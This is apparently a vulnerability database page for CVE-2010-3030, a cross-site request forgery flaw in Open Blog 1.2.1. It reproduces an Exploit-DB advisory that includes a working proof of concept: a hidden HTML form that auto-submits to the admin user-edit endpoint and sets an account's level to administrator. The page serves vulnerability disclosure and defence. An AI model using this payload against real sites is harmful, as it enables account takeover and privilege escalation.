CVE-2010-3030

medium
Published 2010-08-17 Β· Modified 2026-04-29
CVSS v3
β€”
CVSS v4 NEW
β€”
not yet in upstream
VIR risk
7.8

Description

Cross-site request forgery (CSRF) vulnerability in Tomaz Muraus Open Blog 1.2.1, and possibly earlier, allows remote attackers to hijack the authentication of administrators for requests that change the administrative password. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.

Predictions

Exploit likelihood
20%
Patch ETA
β€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or β€” if you've already worked around this in production β€” publish your fix to the community-verified tier.

✚ Propose a mitigation on Community β†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-14562 webapps php text Β· 2 KB
High-Tech Bridge SA Β· 2010-08-05

Open Blog 1.2.1 - Cross-Site Request Forgery

text exploit Source: Exploit-DB
Vulnerability ID: HTB22496
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_open_blog.html
Product: Open Blog
Vendor: TomaΓ…ΒΎ Muraus ( http://www.open-blog.info/ )
Vulnerable Version: 1.2.1 and Probably Prior Versions
Vendor Notification: 22 July 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the "/application/modules/admin/controllers/users.php" script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/admin/users/edit" method="post" >
<input type="hidden" name="display_name" value="User" />
<input type="hidden" name="level" value="administrator" />
<input type="hidden" name="email" value="email (at) example (dot) com [email concealed]" />
<input type="hidden" name="website" value="" />
<input type="hidden" name="msn_messenger" value="" />
<input type="hidden" name="jabber" value="" />
<input type="hidden" name="about_me" value="about_me" />
<input type="hidden" name="id" value="2" />
<input type="submit" name="submit" id="sbmtit" value="Edit β€Ίβ€Ί" />

</form>
<script>
document.getElementById('sbmtit').click();
</script>

Application impact

VendorProductVersionsFixed
tomaz-murausopen_blog1.2.1

References

CWEs

CWE-352

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.